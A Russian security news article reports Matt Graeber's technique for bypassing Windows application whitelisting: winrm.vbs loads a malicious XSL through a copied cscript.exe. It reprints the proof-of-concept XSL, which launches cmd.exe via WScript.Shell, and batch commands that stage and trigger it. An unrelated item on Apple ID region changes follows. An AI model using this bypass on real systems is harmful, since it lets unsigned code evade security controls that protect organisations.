В Windows найден метод обхода белых списков приложений

Олег Иванов 16 Июля 2018 - 08:51

...

В Windows найден метод обхода белых списков приложений

Исследователь в области кибербезопасности Мэтт Гребер нашел интересный метод обхода белых списков приложений в Windows. Помимо этого, эксперт описал технику выполнения произвольного неподписанного кода в winrm.vbs.

winrm.vbs (подписанный Windows скрипт в System32) способен выполнять контролируемый злоумышленником XSL, который не попадет под ограничения «enlightened script host», в результате это приведет к выполнению произвольного неподписанного кода.

«Если вы добавляете “-format:pretty” или “ -format:text” в winrm.vbs, он вытащит WsmPty.xsl или WsmTxt.xsl из каталога, в котором находится cscript.exe. Это значит, что атакующий может скопировать cscript.exe в нужное ему место, где находится вредоносный XSL», — пишет специалист.

«Благодаря этому киберпреступник может добиться выполнения произвольного неподписанного кода. Эта техника практически идентична описанному Кейси Смитом методу с использованием wmic.exe».

Что касается Proof-of-Concept, эксперт опубликовал следующие шаги:

Поместить вредоносный файл WsmPty.xsl или WsmTxt.xsl в контролируемую атакующим директорию.
Скопировать файл cscript.exe или wscript.exe в ту же самую директорию.
Выполнить winrm.vbs с «-format», указав «pretty» (если был помещен файл WsmPty.xsl) или «text» (если был помещен файл WsmTxt.xsl).

Исследователь привел пример вредоносного XSL, который можно поместить в контролируемый злоумышленником каталог. В качестве примера эксперт помещает файл по этому пути — C:\BypassDir\WsmPty.xsl.

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
 <ms:script implements-prefix="user" language="JScript">
 <![CDATA[
 var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
 ]]> </ms:script>
</stylesheet>

Грамотное оформление вредоносного файла WsmPty.xsl должно включать использование встроенного пейлоада DotNetToJScript, приводящего к выполнению произвольного кода.

«В процессе помещения файла WsmPty.xsl можно использовать следующий пакетный файл для запуска пейлоада», — объясняет эксперт:

mkdir %SystemDrive%\BypassDir
copy %windir%\System32\cscript.exe %SystemDrive%\BypassDir
%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty

Следующая главная новость »

Vulnerability Management 2026: что в управлении уязвимостями уже не работает?
Регистрируйтесь на эфир!

Яков Шпунт 02 Апреля 2026 - 11:34

macOS iOS Соответствие законодательству РФ Домашние пользователи

Россияне, оплатившее доступ к Apple ID вперед, не могут сменить регион

Российские пользователи Apple, которые до 1 апреля успели пополнить Apple ID или просто не израсходовали оставшиеся на счёте средства, столкнулись с проблемой при попытке сменить страну учётной записи, чтобы продолжить оплачивать приложения и подписки. На этом фоне также появились сообщения о потере доступа к iCloud.

О проблеме сообщил телеграм-канал SHOT. По его данным, пользователи, пытавшиеся сменить страну при наличии средств на счёте Apple ID, получали уведомление о невозможности выполнить эту операцию.

Кроме того, у них якобы возникали проблемы с доступом к iCloud. Таким способом пользователи пытались обойти невозможность оплаты сервисов Apple, которую российские операторы закрыли с 1 апреля.

Однако, как отметил ведущий аналитик Mobile Research Group Эльдар Муртазин в комментарии для РИА Новости, эта проблема носит технический характер: «При смене региона пользователю нужно потратить все деньги, которые есть на счёте. То есть, если у тебя на счёте магазина приложений есть деньги, то тебе их нужно потратить».

По словам эксперта, после обнуления баланса возможность сменить регион снова появляется. По мнению Эльдара Муртазина, у Apple просто не предусмотрен механизм конвертации валют. При этом сама по себе смена региона не должна приводить к потере доступа к iCloud.

Как дополняет AppleInsider.ru, для смены региона необходимо не только потратить все средства со счёта Apple ID, но и отменить предзаказы приложений, завершить прокат фильмов, отменить либо дождаться окончания всех подписок, а также выйти из семейного доступа. Эти требования действуют для пользователей во всех странах и не связаны с санкционными ограничениями.

Между тем, как сообщили «Известия» со ссылкой на свои источники, к концу года россияне могут лишиться и возможности оплачивать аккаунты с помощью подарочных карт. Пока такие карты ещё можно купить через банковские приложения и в розничных магазинах. Однако из-за резко выросшего с 1 апреля спроса цены на них уже начали заметно расти. Так, карты номиналом 1 тыс. рублей встречаются в продаже почти за 1900 рублей. В то же время, по оценке Эльдара Муртазина, наценка у большинства продавцов всё же не превышает 40%.

Как выяснило издание, никаких предписаний о снятии подарочных карт с продажи — ни в традиционной рознице, ни в онлайне — пока не поступало. Но даже если такие ограничения появятся, как считает директор Института исследований интернета Карен Казарян, на небольших онлайн-площадках такие карты всё равно, вероятно, останутся доступными.

При этом давление на Apple, по мнению ИТ-блогера Олега Капранова, будет усиливаться: «Компания, действуя в русле санкционных ограничений, удалила из App Store приложения крупнейших российских компаний и не допустила в магазин альтернативную платформу RuStore. В результате сложилась ситуация, когда экосистема Apple выступает своеобразным денежным пылесосом, который высасывает деньги из РФ, не позволяя российским компаниям там зарабатывать. Подобное положение не может сохраняться длительное время».

Vulnerability Management 2026: что в управлении уязвимостями уже не работает?
Регистрируйтесь на эфир!